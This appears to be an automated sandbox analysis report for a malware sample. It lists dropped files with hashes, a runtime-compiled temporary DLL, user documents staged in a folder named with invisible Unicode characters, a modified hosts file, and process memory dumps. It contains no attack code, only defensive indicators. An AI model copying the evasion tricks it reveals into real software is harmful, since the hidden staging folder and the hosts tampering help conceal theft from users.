C:\Users\Admin\AppData\Local\Temp\tvrrwgbj\tvrrwgbj.dll

Filesize
4KB

MD5
b41203d9fd6de3b6963749b4425e77f3

SHA1
7b49751c3b376d678cb27b111e31635299529bd0

SHA256
e149051b37b3d38d0602b4cbb607eb3217301dc8b7938730057dfa3aed5cf5e0

SHA512
c489e10c4a36d8130e3f9b70ed0502e74d0bc73d0c02ac35bd4e96405ea1d41d5b2bf7db954961b9836ea3eaab65e6729f93d743dcaab9a0bb37677dc5c83f9f

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ ‏ \Common Files\Desktop\BackupStart.rtf

Filesize
445KB

MD5
b90b1cd8c790c083d1b49c30e296ca6b

SHA1
f24e8621e30e2afe76655eb82f79eb94cc7e0d47

SHA256
2b6b8086a2568f0ea533eecd864292ba5cb388bd498088ba3d2e5a3269c40ea8

SHA512
db728126fb6d6fb20bf12b304e026565d7836f641b6ba4a55906252775b5a3dafe1b3daacec8eb7d49fd5fe45ee14adde88b7f9f4183a98cf76d885cdfda42cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ ‏ \Common Files\Desktop\ClearBackup.otf

Filesize
424KB

MD5
84569e24a0b99ae0412a38d631233956

SHA1
04e13ed6bddf9abccbb93f62e654366574f1c3bb

SHA256
5bccfd5fc668a50a9b35671d188acb47ff23afeb6bf5ed019bbf230934c026b0

SHA512
67fac721839b370bf07c306706cd9a604bfad524063b160d76b77c9aa95dbb20e8d9a132ad750287bc72dc7fa1ec993590ef99d8570a37c61f3f82f9fb6aff18

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ ‏ \Common Files\Desktop\FindOpen.jpeg

Filesize
275KB

MD5
a6f9d53196655e69d533270314ffe557

SHA1
db8d7d5b69c57bd9fa94ea585f4f5971929df70f

SHA256
98efa92147b6680f6b2963c41513332c6db35b28e8474e1cbb559dfdf423e325

SHA512
b2c4cdb28fd1d28e476161d581175cd66f7e6e525f6622238db84ac38b8c85fffd1e181c36b88f8e1dc95fb7c9a06301bcf3079ce40f496ad0bed556de0809d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ ‏ \Common Files\Desktop\MoveSuspend.docx

Filesize
1.1MB

MD5
06823da49ca0b1655210ad6fd40a4a78

SHA1
57295ee8ff0beb2196ecf0101cc62e349e565ed6

SHA256
893365154587f1a5bd91f48946a2e3acca5384bb8be8e0457b25da542dcae18a

SHA512
b70a60af5b55e3ddd07836fa14f3a008fd75fdd37306ac788e41690b56209c8bf1307f5ab07c3c7f1133365d8aff2998a70165995589c79636fbd752f2d8290e

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ ‏ \Common Files\Desktop\OptimizeResume.mp3

Filesize
318KB

MD5
c7bdce5fd4a836bd091b0cab98c26c30

SHA1
661315187fdd14fade44ffaad920c020182b1785

SHA256
ebc75263e9d5592be84ee577f63e400779942eb175b68ec94ae2f22749b78eca

SHA512
c0de7d3f30615a19605ba47a86f999c82b09cd319aefe5163b73ad225658a8b7c22073034da9aa314b8c50de433af2178e1c692d6cf2ebdb40d1061b5b0f424e

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ ‏ \Common Files\Documents\GetApprove.xlsx

Filesize
1017KB

MD5
4e332e509c9b14753eed4f8ff52ab270

SHA1
7ed79309bf5369bb3e2e7261fffc51e2d76e6f71

SHA256
d3a9ff965ccce9eb533775adbf0bf44c4f03d08593b380ee07cf28eb39cf313b

SHA512
0d29320ba26712c70174aa9ba446827acacc6d961f07e69ef1ec8d9cbb4f06a069772c1d0056857acd28abe86860a7bfd8b65d37c2ee797f8516f21b28f3e61d

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ ‏ \Common Files\Documents\MountLimit.pdf

Filesize
899KB

MD5
353b72a90afa456a79c12dfc491a6db5

SHA1
dc6a0cd500bac25f1f065c3c3e0408e4ab4c7fee

SHA256
a8d933a7426b6d658cd3a0d9c3fb91153284bc034cbfa963290dfca033c5c438

SHA512
86fff7b2058d0d561cf6b2f8a118b4b30bdc7dd37bb7818cf5e0f5a0456ef84a6c87067b133875ab1142c731883ac795620310a36f9d9224f8fd0a76aad2e1cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ ‏ \Common Files\Documents\ResumeConvert.pdf

Filesize
870KB

MD5
99924561c4a0c22c01cc9b3ba8261455

SHA1
8a98f0be970df2c86962a3dc0dff3d9eaa0833b7

SHA256
ddadd5c20c00a3bde43aab062f69ba23c7a26b21b1dbdac133aa5cda5f313a57

SHA512
044281f88228d32554e84520ed85f777bddef526f2d703af4c8c77c8e6d8c6ab0acea39cf2c261a3edb12805caebaa485d7c80a2daaa2669902a02dc2f53975f

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ ‏ \Common Files\Documents\UnblockDismount.pdf

Filesize
1.5MB

MD5
c42b3b24250e12cdeac0f0d1f7487d0f

SHA1
55b5fbae618c68e8e5dedbc86273ea0538085b56

SHA256
65334da7e6a7b73fb8ea7bf90678a853b7e5995bb582cbc02e5742bf391132c7

SHA512
8606a3647207a1c1e6ef74adb4c4aec54de56d4cf6fd5ed6cf8689e6db7b430caa08193087a9ef1791958d460472b9463e4749d0a6d3fc8a32fc21f321233f52

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ ‏ \Common Files\Documents\WatchExit.docx

Filesize
929KB

MD5
f593c3673d53f8e8a24984894ca21802

SHA1
ad05fb8d8db1199b48e2f42292ecbaa71ba004e6

SHA256
b2fb2d9f62c11c25665ef4b28876a19bb9c3e50f2610cc6cc8e24aee18cf7cfd

SHA512
a9dbb6c6d48352660abf0058e14a4e9f277e61871829ad97190a7652a0d3fa7e815c4a89e8cba6f3a1e56cf43ab7879aeef19dfdcd4d55ea589058fb2a233ab2

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ ‏ \Common Files\Downloads\DebugRemove.txt

Filesize
425KB

MD5
851d677fdcaa73d8d3f2fe427ffeb033

SHA1
e6cb53bceb6d2dda7e092788e1ce6bb2485cf3f6

SHA256
0fb4a504b0136c897229f283515dde03199ca98ec1fa848f363578638ad9245e

SHA512
ff51f796708e080e956850574a3fcae87d2adc41ca9dcdc9b4f797819f0e3a2a0ad4c162e641ade3267c380b8fedef3a313d68629edbddc76b3284d48f1455a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ ‏ \Common Files\Downloads\StartExit.doc

Filesize
667KB

MD5
7090eabf0fd535e4afb093f44293a5a1

SHA1
f66cb9685f57a9555b61172c73fe81998dd88488

SHA256
b1751fb77be01d66f7f203530de39d35f972e36bef93fd2b87c8d2f30b9d395c

SHA512
c26eb8f629c79ba70509368e7b1342f0333a15037fb15ba5b357b4015efa99c59cd22e0c4bf12afea643df0d6cd0cbd716f0683d079b8f912c3ee5d649d4b2d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ ‏ \Common Files\Pictures\ConvertToUnblock.jpg

Filesize
176KB

MD5
2352edf4ee04b9a885faf2e648ffbfcc

SHA1
14d9cfb09e4e9bd7136a7a0bb28240d02679de38

SHA256
c1d9aafcdd3d0f9cd542e0155cea13a0343f3be87c72b9ea05665cbd35d95353

SHA512
48cbea702c72d86dae36549a42232025f11e74476dc1157440a1529ead634ab99977a8fedbb834c3da77be1178df6f68a80a862d81cdb53bc8a1f16595b153ae

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tvrrwgbj\CSCADA55D30129E46449660DDE7B5CFF461.TMP

Filesize
652B

MD5
0666110b8b9e34a541a4ffc3b9cba991

SHA1
5b5611f3741207898e78b18499d3a8b5361b4cfc

SHA256
09eee619bbd4d730bbad7b97abca76ed24251eeeedf9834241537df7d0859f27

SHA512
58df8740df698fc97cb6c6d58621866bbe82318d14e298d1dd47574aa1755f54893a0eb313919b3aaeb6c22d823a17e6b3fa13095f9936de8da14771a1a48bfb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tvrrwgbj\tvrrwgbj.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tvrrwgbj\tvrrwgbj.cmdline

Filesize
607B

MD5
4807e0de9b774bc78eb40050e9abc972

SHA1
b0983602b0ce50117136216cd48703b9cc2d501a

SHA256
0d96ad9763d52db116fdb8324a6a55876e989468a9d5bf5b546f77b5dc133521

SHA512
84782b0808c8737a11986195bbec8f3d193eddf3e69ba879cf7129dc788b11dcd43c807be0f8a0fecd49e61c1cb1f16ead31f79431d09c64340a421dfd6f2e31

Download Submit
memory/1336-82-0x00000227BA8F0000-0x00000227BA912000-memory.dmp

Filesize
136KB

Download
memory/1972-194-0x0000026DB9EA0000-0x0000026DB9EA8000-memory.dmp

Filesize
32KB

Download
memory/3900-64-0x00007FFC45630000-0x00007FFC4563D000-memory.dmp

Filesize
52KB

Download
memory/3900-72-0x0000029DC3400000-0x0000029DC3929000-memory.dmp

Filesize
5.2MB

Download
memory/3900-259-0x00007FFC3C280000-0x00007FFC3C299000-memory.dmp

Filesize
100KB

Download
memory/3900-299-0x00007FFC29F00000-0x00007FFC2A429000-memory.dmp

Filesize
5.2MB

Download
memory/3900-173-0x00007FFC3BBA0000-0x00007FFC3BD1F000-memory.dmp

Filesize
1.5MB

Download
memory/3900-105-0x00007FFC3C080000-0x00007FFC3C0A4000-memory.dmp

Filesize
144KB

Download
memory/3900-300-0x00007FFC2A430000-0x00007FFC2AAF4000-memory.dmp

Filesize
6.8MB

Download
memory/3900-314-0x00007FFC30670000-0x00007FFC3078B000-memory.dmp

Filesize
1.1MB

Download
memory/3900-306-0x00007FFC3BBA0000-0x00007FFC3BD1F000-memory.dmp

Filesize
1.5MB

Download
memory/3900-301-0x00007FFC3F020000-0x00007FFC3F045000-memory.dmp

Filesize
148KB

Download
memory/3900-298-0x0000029DC3400000-0x0000029DC3929000-memory.dmp

Filesize
5.2MB

Download
memory/3900-80-0x00007FFC3C420000-0x00007FFC3C43A000-memory.dmp

Filesize
104KB

Download
memory/3900-81-0x00007FFC30670000-0x00007FFC3078B000-memory.dmp

Filesize
1.1MB

Download
memory/3900-62-0x00007FFC3C280000-0x00007FFC3C299000-memory.dmp

Filesize
100KB

Download
memory/3900-73-0x00007FFC29F00000-0x00007FFC2A429000-memory.dmp

Filesize
5.2MB

Download
memory/3900-54-0x00007FFC3EFF0000-0x00007FFC3F01D000-memory.dmp

Filesize
180KB

Download
memory/3900-71-0x00007FFC3B330000-0x00007FFC3B3FD000-memory.dmp

Filesize
820KB

Download
memory/3900-70-0x00007FFC2A430000-0x00007FFC2AAF4000-memory.dmp

Filesize
6.8MB

Download
memory/3900-76-0x00007FFC3B500000-0x00007FFC3B514000-memory.dmp

Filesize
80KB

Download
memory/3900-66-0x00007FFC3B400000-0x00007FFC3B433000-memory.dmp

Filesize
204KB

Download
memory/3900-261-0x00007FFC3B400000-0x00007FFC3B433000-memory.dmp

Filesize
204KB

Download
memory/3900-74-0x00007FFC3F020000-0x00007FFC3F045000-memory.dmp

Filesize
148KB

Download
memory/3900-297-0x00007FFC3B330000-0x00007FFC3B3FD000-memory.dmp

Filesize
820KB

Download
memory/3900-56-0x00007FFC3C420000-0x00007FFC3C43A000-memory.dmp

Filesize
104KB

Download
memory/3900-78-0x00007FFC447F0000-0x00007FFC447FD000-memory.dmp

Filesize
52KB

Download
memory/3900-58-0x00007FFC3C080000-0x00007FFC3C0A4000-memory.dmp

Filesize
144KB

Download
memory/3900-32-0x00007FFC457C0000-0x00007FFC457CF000-memory.dmp

Filesize
60KB

Download
memory/3900-60-0x00007FFC3BBA0000-0x00007FFC3BD1F000-memory.dmp

Filesize
1.5MB

Download
memory/3900-29-0x00007FFC3F020000-0x00007FFC3F045000-memory.dmp

Filesize
148KB

Download
memory/3900-25-0x00007FFC2A430000-0x00007FFC2AAF4000-memory.dmp

Filesize
6.8MB

Download
memory/3900-327-0x00007FFC3B500000-0x00007FFC3B514000-memory.dmp

Filesize
80KB

Download
memory/3900-342-0x00007FFC30670000-0x00007FFC3078B000-memory.dmp

Filesize
1.1MB

Download
memory/3900-341-0x00007FFC447F0000-0x00007FFC447FD000-memory.dmp

Filesize
52KB

Download
memory/3900-340-0x00007FFC3B400000-0x00007FFC3B433000-memory.dmp

Filesize
204KB

Download
memory/3900-339-0x00007FFC3B330000-0x00007FFC3B3FD000-memory.dmp

Filesize
820KB

Download
memory/3900-338-0x00007FFC45630000-0x00007FFC4563D000-memory.dmp

Filesize
52KB

Download
memory/3900-337-0x00007FFC3C280000-0x00007FFC3C299000-memory.dmp

Filesize
100KB

Download
memory/3900-336-0x00007FFC3BBA0000-0x00007FFC3BD1F000-memory.dmp

Filesize
1.5MB

Download
memory/3900-335-0x00007FFC3C080000-0x00007FFC3C0A4000-memory.dmp

Filesize
144KB

Download
memory/3900-334-0x00007FFC3C420000-0x00007FFC3C43A000-memory.dmp

Filesize
104KB

Download
memory/3900-333-0x00007FFC3EFF0000-0x00007FFC3F01D000-memory.dmp

Filesize
180KB

Download
memory/3900-332-0x00007FFC457C0000-0x00007FFC457CF000-memory.dmp

Filesize
60KB

Download
memory/3900-331-0x00007FFC3F020000-0x00007FFC3F045000-memory.dmp

Filesize
148KB

Download
memory/3900-330-0x00007FFC29F00000-0x00007FFC2A429000-memory.dmp

Filesize
5.2MB

Download
memory/3900-315-0x00007FFC2A430000-0x00007FFC2AAF4000-memory.dmp

Filesize
6.8MB

Download